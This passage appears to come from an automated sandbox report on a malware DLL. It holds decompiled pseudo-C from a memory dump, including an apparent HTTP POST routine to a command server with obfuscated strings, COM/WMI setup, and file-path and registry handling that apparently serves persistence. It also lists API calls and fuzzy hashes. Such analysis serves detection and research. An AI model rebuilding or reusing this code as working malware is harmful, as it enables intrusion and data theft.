    						goto L42;
    					}
    					_t262 = _v32;
    					goto L48;
    				} else {
    					E10008600( &_v36, _t322);
    					_t320 = _v36;
    					goto L53;
    				}
    			}

    APIs
      • Part of subcall function 1000D52E: CoInitializeEx.OLE32(00000000,00000000,00000000,?,00000000,00000000,?,1000D82E,00000C5B,00000000,?,00000000), ref: 1000D541
      • Part of subcall function 1000D52E: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,1000D82E,00000C5B,00000000,?,00000000), ref: 1000D552
      • Part of subcall function 1000D52E: CoCreateInstance.OLE32(1001B840,00000000,00000001,1001B850,?,?,1000D82E,00000C5B,00000000,?,00000000), ref: 1000D569
      • Part of subcall function 1000D52E: SysAllocString.OLEAUT32(00000000), ref: 1000D574
      • Part of subcall function 1000D52E: CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,1000D82E,00000C5B,00000000,?,00000000), ref: 1000D59F
      • Part of subcall function 100085EA: RtlAllocateHeap.NTDLL(00000008,?,?,10008F6A,00000100,?,10005FA8), ref: 100085F8
    • SysAllocString.OLEAUT32(00000000), ref: 1000DBF0
    • SysAllocString.OLEAUT32(00000000), ref: 1000DC04
    • SysFreeString.OLEAUT32(?), ref: 1000DF8D
    • SysFreeString.OLEAUT32(?), ref: 1000DF96
      • Part of subcall function 10008600: HeapFree.KERNEL32(00000000,00000000,00000001,000000FF,10006020), ref: 10008646
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.701441727.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.701429892.0000000010000000.00000002.00020000.sdmp
    Similarity
    • API ID: String$AllocFree$HeapInitialize$AllocateBlanketCreateInstanceProxySecurity
    • String ID: FALSE$TRUE
    • API String ID: 1290676130-1412513891
    • Opcode ID: e90d5b011f5971edd279b69304d2787e03839083f027a6c7d93be243f4a939b2
    • Instruction ID: 87b8d808fb387f8005252730a36ddfdad2d71f946437a17ee317db8df35d95d4
    • Opcode Fuzzy Hash: e90d5b011f5971edd279b69304d2787e03839083f027a6c7d93be243f4a939b2
    • Instruction Fuzzy Hash: 82E16375D006199FEB05EFE4CC85EEEBBB9FF08380F10455AE505AB259DB31AA05CB60
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 83%
    			E1000E673(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20, intOrPtr _a24) {
    				char _v8;
    				char _v12;
    				signed int _v16;
    				signed int _v20;
    				char _v24;
    				intOrPtr _v28;
    				char _v32;
    				intOrPtr _v36;
    				signed int _v40;
    				signed int _v44;
    				intOrPtr _v48;
    				intOrPtr _v52;
    				intOrPtr _v56;
    				intOrPtr _v60;
    				char _v64;
    				int _v76;
    				void* _v80;
    				intOrPtr _v100;
    				int _v104;
    				void* _v108;
    				intOrPtr _v112;
    				intOrPtr _v116;
    				char* _v120;
    				void _v124;
    				char _v140;
    				void _v396;
    				void _v652;
    				intOrPtr _t105;
    				intOrPtr _t113;
    				intOrPtr* _t115;
    				intOrPtr _t118;
    				intOrPtr _t121;
    				intOrPtr _t124;
    				intOrPtr _t127;
    				intOrPtr _t131;
    				char _t133;
    				intOrPtr _t136;
    				char _t138;
    				char _t139;
    				intOrPtr _t141;
    				intOrPtr _t147;
    				intOrPtr _t154;
    				intOrPtr _t158;
    				intOrPtr _t162;
    				intOrPtr _t164;
    				intOrPtr _t166;
    				intOrPtr _t172;
    				intOrPtr _t176;
    				void* _t183;
    				void* _t185;
    				intOrPtr _t186;
    				char _t195;
    				intOrPtr _t203;
    				intOrPtr _t204;
    				signed int _t209;
    				void _t212;
    				intOrPtr _t213;
    				void* _t214;
    				intOrPtr _t216;
    				char _t217;
    				intOrPtr _t218;
    				signed int _t219;
    				signed int _t220;
    				void* _t221;
    
    				_v40 = _v40 & 0x00000000;
    				_v24 = 4;
    				_v36 = 1;
    				_t214 = __edx;
    				memset( &_v396, 0, 0x100);
    				memset( &_v652, 0, 0x100);
    				_v64 = E100095AD(0x85b);
    				_v60 = E100095AD(0xdc9);
    				_v56 = E100095AD(0x65d);
    				_v52 = E100095AD(0xdd3);
    				_t105 = E100095AD(0xb74);
    				_v44 = _v44 & 0;
    				_t212 = 0x3c;
    				_v48 = _t105;
    				memset( &_v124, 0, 0x100);
    				_v116 = 0x10;
    				_v120 =  &_v140;
    				_v124 = _t212;
    				_v108 =  &_v396;
    				_v104 = 0x100;
    				_v80 =  &_v652;
    				_push( &_v124);
    				_push(0);
    				_v76 = 0x100;
    				_push(E1000C384(_t214));
    				_t113 =  *0x1001e6a4; // 0x0
    				_push(_t214);
    				if( *((intOrPtr*)(_t113 + 0x28))() != 0) {
    					_t209 = 0;
    					_v20 = 0;
    					do {
    						_t115 =  *0x1001e6a4; // 0x0
    						_v12 = 0x8404f700;
    						_t213 =  *_t115( *0x1001e788,  *((intOrPtr*)(_t221 + _t209 * 4 - 0x24)), 0, 0, 0);
    						if(_t213 != 0) {
    							_t195 = 3;
    							_t185 = 4;
    							_v8 = _t195;
    							_t118 =  *0x1001e6a4; // 0x0
    							 *((intOrPtr*)(_t118 + 0x14))(_t213, _t195,  &_v8, _t185);
    							_v8 = 0x3a98;
    							_t121 =  *0x1001e6a4; // 0x0
    							 *((intOrPtr*)(_t121 + 0x14))(_t213, 2,  &_v8, _t185);
    							_v8 = 0x493e0;
    							_t124 =  *0x1001e6a4; // 0x0
    							 *((intOrPtr*)(_t124 + 0x14))(_t213, 6,  &_v8, _t185);
    							_v8 = 0x493e0;
    							_t127 =  *0x1001e6a4; // 0x0
    							 *((intOrPtr*)(_t127 + 0x14))(_t213, 5,  &_v8, _t185);
    							_t131 =  *0x1001e6a4; // 0x0
    							_t186 =  *((intOrPtr*)(_t131 + 0x1c))(_t213,  &_v396, _v100, 0, 0, 3, 0, 0);
    							if(_a24 != 0) {
    								E100097F2(_a24);
    							}
    							if(_t186 != 0) {
    								_t133 = 0x8484f700;
    								if(_v112 != 4) {
    									_t133 = _v12;
    								}
    								_t136 =  *0x1001e6a4; // 0x0
    								_t216 =  *((intOrPtr*)(_t136 + 0x20))(_t186, "POST",  &_v652, 0, 0,  &_v64, _t133, 0);
    								_v8 = _t216;
    								if(_a24 != 0) {
    									E100097F2(_a24);
    								}
    								if(_t216 != 0) {
    									_t138 = 4;
    									if(_v112 != _t138) {
    										L19:
    										_t139 = E100095AD(0x777);
    										_t217 = _t139;
    										_v12 = _t217;
    										_t141 =  *0x1001e6a4; // 0x0
    										_t218 = _v8;
    										_v28 =  *((intOrPtr*)(_t141 + 0x24))(_t218, _t217, E1000C384(_t217), _a4, _a8);
    										E100085A8( &_v12);
    										if(_a24 != 0) {
    											E100097F2(_a24);
    										}
    										if(_v28 != 0) {
    											L28:
    											_v24 = 8;
    											_push(0);
    											_v32 = 0;
    											_v28 = 0;
    											_push( &_v24);
    											_push( &_v32);
    											_t147 =  *0x1001e6a4; // 0x0
    											_push(0x13);
    											_push(_t218);
    											if( *((intOrPtr*)(_t147 + 0xc))() != 0) {
    												_t219 = E1000972F( &_v32);
    												if(_t219 == 0xc8) {
    													 *_a20 = _v8;
    													 *_a12 = _t213;
    													 *_a16 = _t186;
    													return 0;
    												}
    												_t220 =  ~_t219;
    												L32:
    												_t154 =  *0x1001e6a4; // 0x0
    												 *((intOrPtr*)(_t154 + 8))(_v8);
    												L33:
    												if(_t186 != 0) {
    													_t158 =  *0x1001e6a4; // 0x0
    													 *((intOrPtr*)(_t158 + 8))(_t186);
    												}
    												if(_t213 != 0) {
    													_t203 =  *0x1001e6a4; // 0x0
    													 *((intOrPtr*)(_t203 + 8))(_t213);
    												}
    												return _t220;
    											}
    											GetLastError();
    											_t220 = 0xfffffff8;
    											goto L32;
    										} else {
    											GetLastError();
    											_t162 =  *0x1001e6a4; // 0x0
    											 *((intOrPtr*)(_t162 + 8))(_t218);
    											_t218 = 0;
    											goto L23;
    										}
    									}
    									_v12 = _t138;
    									_push( &_v12);
    									_push( &_v16);
    									_t172 =  *0x1001e6a4; // 0x0
    									_push(0x1f);
    									_push(_t216);
    									if( *((intOrPtr*)(_t172 + 0x18))() == 0) {
    										L18:
    										GetLastError();
    										goto L19;
    									}
    									_v16 = _v16 | 0x00003380;
    									_push(4);
    									_push( &_v16);
    									_t176 =  *0x1001e6a4; // 0x0
    									_push(0x1f);
    									_push(_t216);
    									if( *((intOrPtr*)(_t176 + 0x14))() != 0) {
    										goto L19;
    									}
    									goto L18;
    								} else {
    									GetLastError();
    									L23:
    									_t164 =  *0x1001e6a4; // 0x0
    									 *((intOrPtr*)(_t164 + 8))(_t186);
    									_t186 = 0;
    									goto L24;
    								}
    							} else {
    								GetLastError();
    								L24:
    								_t166 =  *0x1001e6a4; // 0x0
    								 *((intOrPtr*)(_t166 + 8))(_t213);
    								_t213 = 0;
    								goto L25;
    							}
    						}
    						GetLastError();
    						L25:
    						_t204 = _t218;
    						_t209 = _v20 + 1;
    						_v20 = _t209;
    					} while (_t209 < 2);
    					_v8 = _t218;
    					if(_t204 != 0) {
    						goto L28;
    					}
    					_t220 = 0xfffffffe;
    					goto L33;
    				}
    				_t183 = 0xfffffffc;
    				return _t183;
    			}

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.701441727.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.701429892.0000000010000000.00000002.00020000.sdmp
    Similarity
    • API ID: memset$ErrorLast
    • String ID: POST
    • API String ID: 2570506013-1814004025
    • Opcode ID: b2cbd98b9ed9432ed6e1f8a9232582811ae6687bac74e989c4c0fe043f55e73f
    • Instruction ID: 7105dce4f630bd9e6e6a53a20e835c867cf8d9cfb236b462118b6997004ea025
    • Opcode Fuzzy Hash: b2cbd98b9ed9432ed6e1f8a9232582811ae6687bac74e989c4c0fe043f55e73f
    • Instruction Fuzzy Hash: C2B14CB1900259AFEB55DFA4CC88E9E7BF8EF48390F108069F505EB291DB749E44CB61
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 28%
    			E100116C3(signed int* _a4) {
    				char _v8;
    				_Unknown_base(*)()* _v12;
    				_Unknown_base(*)()* _v16;
    				char _v20;
    				_Unknown_base(*)()* _t16;
    				_Unknown_base(*)()* _t17;
    				void* _t22;
    				intOrPtr* _t28;
    				signed int _t29;
    				signed int _t30;
    				struct HINSTANCE__* _t32;
    				void* _t34;
    
    				_t30 = 0;
    				_v8 = 0;
    				_t32 = GetModuleHandleA("advapi32.dll");
    				if(_t32 == 0) {
    					L9:
    					return 1;
    				}
    				_t16 = GetProcAddress(_t32, "CryptAcquireContextA");
    				_v12 = _t16;
    				if(_t16 == 0) {
    					goto L9;
    				}
    				_t17 = GetProcAddress(_t32, "CryptGenRandom");
    				_v16 = _t17;
    				if(_t17 == 0) {
    					goto L9;
    				}
    				_t28 = GetProcAddress(_t32, "CryptReleaseContext");
    				if(_t28 == 0) {
    					goto L9;
    				}
    				_push(0xf0000000);
    				_push(1);
    				_push(0);
    				_push(0);
    				_push( &_v8);
    				if(_v12() == 0) {
    					goto L9;
    				}
    				_t22 = _v16(_v8, 4,  &_v20);
    				 *_t28(_v8, 0);
    				if(_t22 == 0) {
    					goto L9;
    				}
    				_t29 = 0;
    				do {
    					_t30 = _t30 << 0x00000008 |  *(_t34 + _t29 - 0x10) & 0x000000ff;
    					_t29 = _t29 + 1;
    				} while (_t29 < 4);
    				 *_a4 = _t30;
    				return 0;
    			}

    APIs
    • GetModuleHandleA.KERNEL32(advapi32.dll,00000000,00000000,00000000,10007640,?,?,00000000,?), ref: 100116D6
    • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA,?,?,00000000,?), ref: 100116EE
    • GetProcAddress.KERNEL32(00000000,CryptGenRandom,?,?,00000000,?), ref: 100116FD
    • GetProcAddress.KERNEL32(00000000,CryptReleaseContext,?,?,00000000,?), ref: 1001170C
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.701441727.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.701429892.0000000010000000.00000002.00020000.sdmp
    Similarity
    • API ID: AddressProc$HandleModule
    • String ID: CryptAcquireContextA$CryptGenRandom$CryptReleaseContext$advapi32.dll
    • API String ID: 667068680-129414566
    • Opcode ID: ec5d92e1c0308c86bfae05b88449f1b683c9b71fc9a535634b09132dc4920ded
    • Instruction ID: db89102dffd2ab17b34e924f896f3f155d97b8305924242c9699015d1af8b324
    • Opcode Fuzzy Hash: ec5d92e1c0308c86bfae05b88449f1b683c9b71fc9a535634b09132dc4920ded
    • Instruction Fuzzy Hash: 32119431A04619BADB51DBB98C84DFE7BFAEF45640F100464EA05EB280D730CB408B64
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 87%
    			E1001212D(char* _a4, intOrPtr _a8, long long _a12, signed int _a20) {
    				signed int _t12;
    				signed int _t13;
    				int _t15;
    				char* _t24;
    				char* _t26;
    				char* _t28;
    				char* _t29;
    				signed int _t40;
    				char* _t43;
    				char* _t45;
    				long long* _t47;
    
    				_t12 = _a20;
    				if(_t12 == 0) {
    					_t12 = 0x11;
    				}
    				_t26 = _a4;
    				_push(_t30);
    				 *_t47 = _a12;
    				_push(_t12);
    				_push("%.*g");
    				_push(_a8);
    				_push(_t26);
    				L10012290();
    				_t40 = _t12;
    				if(_t40 < 0 || _t40 >= _a8) {
    					L19:
    					_t13 = _t12 | 0xffffffff;
    					goto L20;
    				} else {
    					L100122D8();
    					_t15 =  *((intOrPtr*)( *_t12));
    					if(_t15 != 0x2e) {
    						_t24 = strchr(_t26, _t15);
    						if(_t24 != 0) {
    							 *_t24 = 0x2e;
    						}
    					}
    					if(strchr(_t26, 0x2e) != 0 || strchr(_t26, 0x65) != 0) {
    						L11:
    						_t43 = strchr(_t26, 0x65);
    						_t28 = _t43;
    						if(_t43 == 0) {
    							L18:
    							_t13 = _t40;
    							L20:
    							return _t13;
    						}
    						_t45 = _t43 + 1;
    						_t29 = _t28 + 2;
    						if( *_t45 == 0x2d) {
    							_t45 = _t29;
    						}
    						while( *_t29 == 0x30) {
    							_t29 = _t29 + 1;
    						}
    						if(_t29 != _t45) {
    							E100086EC(_t45, _t29, _t40 - _t29 + _a4);
    							_t40 = _t40 + _t45 - _t29;
    						}
    						goto L18;
    					} else {
    						_t6 = _t40 + 3; // 0x100109bd
    						_t12 = _t6;
    						if(_t12 >= _a8) {
    							goto L19;
    						}
    						_t26[_t40] = 0x302e;
    						( &(_t26[2]))[_t40] = 0;
    						_t40 = _t40 + 2;
    						goto L11;
    					}
    				}
    			}

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.701441727.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.701429892.0000000010000000.00000002.00020000.sdmp
    Similarity
    • API ID: strchr$_snprintflocaleconv
    • String ID: %.*g
    • API String ID: 1910550357-952554281
    • Opcode ID: 178342c51bf590373a94578d315e398ece8844776024473a8b6624bac67a40ef
    • Instruction ID: 78b3385665a9946d17acecbf697c3f69bb23403c9f6092c9c513caadce452e38
    • Opcode Fuzzy Hash: 178342c51bf590373a94578d315e398ece8844776024473a8b6624bac67a40ef
    • Instruction Fuzzy Hash: FD2145FA60424A3AE321CA689C85BAF37DCDF11270F150115FE408F182E674ECF083A0
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.701441727.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.701429892.0000000010000000.00000002.00020000.sdmp
    Similarity
    • API ID: _snprintfqsort
    • String ID: %I64d$false$null$true
    • API String ID: 756996078-4285102228
    • Opcode ID: d538ba18bf1a1900acc1de5f1acfcc1d0ab55a19687b0d007d211ebddbd5affd
    • Instruction ID: 256b45a573985ee8e5ebbb4f1a01ee0a2bda1a8772a5177783226d7c6d43e220
    • Opcode Fuzzy Hash: d538ba18bf1a1900acc1de5f1acfcc1d0ab55a19687b0d007d211ebddbd5affd
    • Instruction Fuzzy Hash: 1AE17FB1A0020ABFDF11DE65CC46EEF3BA9EF44384F108015FD949E151E7B1DAA19BA1
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 79%
    			E10004A0C(void* __ecx, void* __edx, void* __fp0, intOrPtr* _a4, WCHAR* _a8, signed int _a12) {
    				char _v516;
    				void _v1044;
    				char _v1076;
    				signed int _v1080;
    				signed int _v1096;
    				WCHAR* _v1100;
    				intOrPtr _v1104;
    				signed int _v1108;
    				intOrPtr _v1112;
    				intOrPtr _v1116;
    				char _v1144;
    				char _v1148;
    				void* __esi;
    				intOrPtr _t66;
    				intOrPtr _t73;
    				signed int _t75;
    				intOrPtr _t76;
    				signed int _t81;
    				WCHAR* _t87;
    				void* _t89;
    				signed int _t90;
    				signed int _t91;
    				signed int _t93;
    				signed int _t94;
    				WCHAR* _t96;
    				intOrPtr _t106;
    				intOrPtr _t107;
    				void* _t108;
    				intOrPtr _t109;
    				signed char _t116;
    				WCHAR* _t118;
    				void* _t122;
    				signed int _t123;
    				intOrPtr _t125;
    				void* _t128;
    				void* _t129;
    				WCHAR* _t130;
    				void* _t134;
    				void* _t141;
    				void* _t143;
    				WCHAR* _t145;
    				signed int _t153;
    				void* _t154;
    				void* _t178;
    				signed int _t180;
    				void* _t181;
    				void* _t183;
    				void* _t187;
    				signed int _t188;
    				WCHAR* _t190;
    				signed int _t191;
    				signed int _t192;
    				intOrPtr* _t194;
    				signed int _t196;
    				void* _t199;
    				void* _t200;
    				void* _t201;
    				void* _t202;
    				intOrPtr* _t203;
    				void* _t208;
    
    				_t208 = __fp0;
    				_push(_t191);
    				_t128 = __edx;
    				_t187 = __ecx;
    				_t192 = _t191 | 0xffffffff;
    				memset( &_v1044, 0, 0x20c);
    				_t199 = (_t196 & 0xfffffff8) - 0x454 + 0xc;
    				_v1108 = 1;
    				if(_t187 != 0) {
    					_t123 =  *0x1001e688; // 0x87804a0
    					_t125 =  *0x1001e68c; // 0x87ffa40
    					_v1116 =  *((intOrPtr*)(_t125 + 0x68))(_t187,  *((intOrPtr*)( *((intOrPtr*)(_t123 + 0x110)))));
    				}
    				if(E1000BB73(_t187) != 0) {
    					L4:
    					_t134 = _t128;
    					_t66 = E1000B78E(_t134,  &_v516);
    					_push(_t134);
    					_v1104 = _t66;
    					E1000B663(_t66,  &_v1076, _t206, _t208);
    					_t129 = E100049C8( &_v1076,  &_v1076, _t206);
    					_t141 = E1000D40B( &_v1076, E1000C384( &_v1076), 0);
    					E1000B870(_t141,  &_v1100, _t208);
    					_t175 =  &_v1076;
    					_t73 = E10002C8F(_t187,  &_v1076, _t206, _t208);
    					_v1112 = _t73;
    					_t143 = _t141;
    					if(_t73 != 0) {
    						_push(0);
    						_push(_t129);
    						_push("\\");
    						_t130 = E100092CB(_t73);
    						_t200 = _t199 + 0x10;
    						_t75 =  *0x1001e688; // 0x87804a0
    						__eflags =  *((intOrPtr*)(_t75 + 0x214)) - 3;
    						if( *((intOrPtr*)(_t75 + 0x214)) != 3) {
    							L12:
    							__eflags = _v1108;
    							if(__eflags != 0) {
    								_t76 = E100091C9(_v1112);
    								_t145 = _t130;
    								 *0x1001e740 = _t76;
    								 *0x1001e738 = E100091C9(_t145);
    								L17:
    								_push(_t145);
    								_t188 = E10009B29( &_v1044, _t187, _t208, _v1104,  &_v1080,  &_v1100);
    								_t201 = _t200 + 0x10;
    								__eflags = _t188;
    								if(_t188 == 0) {
    									goto L41;
    								}
    								_push(0x1001b9c2);
    								E10009F2E(0xe);
    								E10009F52(_t188, _t208, _t130);
    								_t194 = _a4;
    								_v1096 = _v1096 & 0x00000000;
    								_push(2);
    								_v1100 =  *_t194;
    								_push(8);
    								_push( &_v1100);
    								_t178 = 0xb;
    								E1000A091(_t188, _t178, _t208);
    								_t179 =  *(_t194 + 0x10);
    								_t202 = _t201 + 0xc;
    								__eflags =  *(_t194 + 0x10);
    								if( *(_t194 + 0x10) != 0) {
    									E1000A3D3(_t188, _t179, _t208);
    								}
    								_t180 =  *(_t194 + 0xc);
    								__eflags = _t180;
    								if(_t180 != 0) {
    									E1000A3D3(_t188, _t180, _t208);
    								}
    								_t87 = E100097F2(0);
    								_push(2);
    								_v1100 = _t87;
    								_t153 = _t188;
    								_push(8);
    								_v1096 = _t180;
    								_push( &_v1100);
    								_t181 = 2;
    								_t89 = E1000A091(_t153, _t181, _t208);
    								_t203 = _t202 + 0xc;
    								__eflags = _v1108;
    								if(_v1108 == 0) {
    									_t153 =  *0x1001e688; // 0x87804a0
    									__eflags =  *((intOrPtr*)(_t153 + 0xa4)) - 1;
    									if(__eflags != 0) {
    										_t90 = E1000FC2A(_t89, _t181, _t208, 0, _t130, 0);
    										_t203 = _t203 + 0xc;
    										goto L26;
    									}
    									_t153 = _t153 + 0x228;
    									goto L25;
    								} else {
    									_t91 =  *0x1001e688; // 0x87804a0
    									__eflags =  *((intOrPtr*)(_t91 + 0xa4)) - 1;
    									if(__eflags != 0) {
    										L32:
    										__eflags =  *(_t91 + 0x1898) & 0x00000082;
    										if(( *(_t91 + 0x1898) & 0x00000082) != 0) {
    											_t183 = 0x64;
    											E1000E249(_t183);
    										}
    										E100052A8( &_v1076, _t208);
    										_t190 = _a8;
    										_t154 = _t153;
    										__eflags = _t190;
    										if(_t190 != 0) {
    											_t94 =  *0x1001e688; // 0x87804a0
    											__eflags =  *((intOrPtr*)(_t94 + 0xa0)) - 1;
    											if( *((intOrPtr*)(_t94 + 0xa0)) != 1) {
    												lstrcpyW(_t190, _t130);
    											} else {
    												_t96 = E1000109A(_t154, 0x228);
    												_v1100 = _t96;
    												lstrcpyW(_t190, _t96);
    												E100085BB( &_v1100);
    												 *_t203 = "\"";
    												lstrcatW(_t190, ??);
    												lstrcatW(_t190, _t130);
    												lstrcatW(_t190, "\"");
    											}
    										}
    										_t93 = _a12;
    										__eflags = _t93;
    										if(_t93 != 0) {
    											 *_t93 = _v1104;
    										}
    										_t192 = 0;
    										__eflags = 0;
    										goto L41;
    									}
    									_t51 = _t91 + 0x228; // 0x87806c8
    									_t153 = _t51;
    									L25:
    									_t90 = E10005527(_t153, _t130, __eflags);
    									L26:
    									__eflags = _t90;
    									if(_t90 >= 0) {
    										_t91 =  *0x1001e688; // 0x87804a0
    										goto L32;
    									}
    									_push(0xfffffffd);
    									L6:
    									_pop(_t192);
    									goto L41;
    								}
    							}
    							_t106 = E1000C29D(_v1104, __eflags);
    							_v1112 = _t106;
    							_t107 =  *0x1001e684; // 0x87ff878
    							_t108 =  *((intOrPtr*)(_t107 + 0xd0))(_t106, 0x80003, 6, 0xff, 0x400, 0x400, 0, 0);
    							__eflags = _t108 - _t192;
    							if(_t108 != _t192) {
    								_t109 =  *0x1001e684; // 0x87ff878
    								 *((intOrPtr*)(_t109 + 0x30))();
    								E10008600( &_v1148, _t192);
    								_t145 = _t108;
    								goto L17;
    							}
    							E10008600( &_v1144, _t192);
    							_t81 = 1;
    							goto L42;
    						}
    						_t116 =  *(_t75 + 0x1898);
    						__eflags = _t116 & 0x00000004;
    						if((_t116 & 0x00000004) == 0) {
    							__eflags = _t116;
    							if(_t116 != 0) {
    								goto L12;
    							}
    							L11:
    							E1000E291(_v1112, _t175);
    							goto L12;
    						}
    						_v1080 = _v1080 & 0x00000000;
    						_t118 = E100095C7(_t143, 0x879);
    						_v1100 = _t118;
    						_t175 = _t118;
    						E1000BFF7(0x80000002, _t118, _v1112, 4,  &_v1080, 4);
    						E100085BB( &_v1100);
    						_t200 = _t200 + 0x14;
    						goto L11;
    					}
    					_push(0xfffffffe);
    					goto L6;
    				} else {
    					_t122 = E10002BA4( &_v1044, _t192, 0x105);
    					_t206 = _t122;
    					if(_t122 == 0) {
    						L41:
    						_t81 = _t192;
    						L42:
    						return _t81;
    					}
    					goto L4;
    				}
    			}

    APIs
    • memset.MSVCRT ref: 10004A2E
    • lstrcpyW.KERNEL32(00000000,00000000), ref: 10004D20
    • lstrcatW.KERNEL32(00000000,?), ref: 10004D3E
    • lstrcatW.KERNEL32(00000000,00000000), ref: 10004D42
    • lstrcatW.KERNEL32(00000000,1001B994), ref: 10004D4A
    • lstrcpyW.KERNEL32(00000000,00000000), ref: 10004D50
    Memory Dump Source
    • Source File: 00000002.00000002.701441727.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.701429892.0000000010000000.00000002.00020000.sdmp
    Similarity
    • API ID: lstrcat$lstrcpy$memset
    • String ID:
    • API String ID: 1985475764-0
    • Opcode ID: 62969c4e8768608e47be4c88e0413589d716b6224435312465d12a19acd94c00
    • Instruction ID: 7ccac8b502451e5b7a742acc225b8edaafd8b9eb524e624c54795ddda11a0b18
    • Opcode Fuzzy Hash: 62969c4e8768608e47be4c88e0413589d716b6224435312465d12a19acd94c00
    • Instruction Fuzzy Hash: 3391ADB5604301ABF304DB20DC86F6E73E9EB84390F124A2DF5559B299EF70ED448B56
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • SysAllocString.OLEAUT32(00000000), ref: 1000D767
    • SysAllocString.OLEAUT32(?), ref: 1000D76F
    • SysAllocString.OLEAUT32(00000000), ref: 1000D783
    • SysFreeString.OLEAUT32(?), ref: 1000D7FE
    • SysFreeString.OLEAUT32(?), ref: 1000D801
    • SysFreeString.OLEAUT32(?), ref: 1000D806
    Memory Dump Source
    • Source File: 00000002.00000002.701441727.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.701429892.0000000010000000.00000002.00020000.sdmp
    Similarity
    • API ID: String$AllocFree
    • String ID:
    • API String ID: 344208780-0
    • Opcode ID: 533f58d5d8afb924d606c824253e1b92029f16f14e0bed1b48c045e6ad26739a
    • Instruction ID: 8cf6b93e2451088eb1bb9766ed2507027e49de2e01c3db39ed6556aff2126d07
    • Opcode Fuzzy Hash: 533f58d5d8afb924d606c824253e1b92029f16f14e0bed1b48c045e6ad26739a
    • Instruction Fuzzy Hash: A521FB75900219BFDB00DFA5CC88DAFBBBDEF48294B1044AAF505A7250DB70AE05CB60
    Uniqueness

    Uniqueness Score: -1.00%

    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.701441727.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.701429892.0000000010000000.00000002.00020000.sdmp
    Similarity
    • API ID:
    • String ID: @$\u%04X$\u%04X\u%04X
    • API String ID: 0-2132903582
    • Opcode ID: feb80d3a04cc4fc4cf5808f9b25bd72cd22dbc47354be86eb52a922d1ecc23a5
    • Instruction ID: 5834604bd64903192ee08d211dc49906cb49224659e5567271de8e71af9a3c4a
    • Opcode Fuzzy Hash: feb80d3a04cc4fc4cf5808f9b25bd72cd22dbc47354be86eb52a922d1ecc23a5
    • Instruction Fuzzy Hash: FB413B72B04249ABEB14CDA88CA5BAE36A8DF01294F104116FDC2DE346DAF1CED183D1
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 30%
    			E1000D52E(void* __ecx) {
    				char _v8;
    				void* _v12;
    				char* _t15;
    				intOrPtr* _t16;
    				void* _t21;
    				intOrPtr* _t23;
    				intOrPtr* _t24;
    				intOrPtr* _t25;
    				void* _t30;
    				void* _t33;
    
    				_v12 = 0;
    				_v8 = 0;
    				__imp__CoInitializeEx(0, 0, _t30, _t33, __ecx, __ecx);
    				__imp__CoInitializeSecurity(0, 0xffffffff, 0, 0, 0, 3, 0, 0, 0);
    				_t15 =  &_v12;
    				__imp__CoCreateInstance(0x1001b840, 0, 1, 0x1001b850, _t15);
    				if(_t15 < 0) {
    					L5:
    					_t23 = _v8;
    					if(_t23 != 0) {
    						 *((intOrPtr*)( *_t23 + 8))(_t23);
    					}
    					_t24 = _v12;
    					if(_t24 != 0) {
    						 *((intOrPtr*)( *_t24 + 8))(_t24);
    					}
    					_t16 = 0;
    				} else {
    					__imp__#2(__ecx);
    					_t25 = _v12;
    					_t21 =  *((intOrPtr*)( *_t25 + 0xc))(_t25, _t15, 0, 0, 0, 0, 0, 0,  &_v8);
    					if(_t21 < 0) {
    						goto L5;
    					} else {
    						__imp__CoSetProxyBlanket(_v8, 0xa, 0, 0, 3, 3, 0, 0);
    						if(_t21 < 0) {
    							goto L5;
    						} else {
    							_t16 = E100085EA(8);
    							if(_t16 == 0) {
    								goto L5;
    							} else {
    								 *((intOrPtr*)(_t16 + 4)) = _v12;
    								 *_t16 = _v8;
    							}
    						}
    					}
    				}
    				return _t16;
    			}














    APIs
    • CoInitializeEx.OLE32(00000000,00000000,00000000,?,00000000,00000000,?,1000D82E,00000C5B,00000000,?,00000000), ref: 1000D541
    • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,1000D82E,00000C5B,00000000,?,00000000), ref: 1000D552
    • CoCreateInstance.OLE32(1001B840,00000000,00000001,1001B850,?,?,1000D82E,00000C5B,00000000,?,00000000), ref: 1000D569
    • SysAllocString.OLEAUT32(00000000), ref: 1000D574
    • CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,1000D82E,00000C5B,00000000,?,00000000), ref: 1000D59F
      • Part of subcall function 100085EA: RtlAllocateHeap.NTDLL(00000008,?,?,10008F6A,00000100,?,10005FA8), ref: 100085F8
    Memory Dump Source
    • Source File: 00000002.00000002.701441727.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.701429892.0000000010000000.00000002.00020000.sdmp
    Similarity
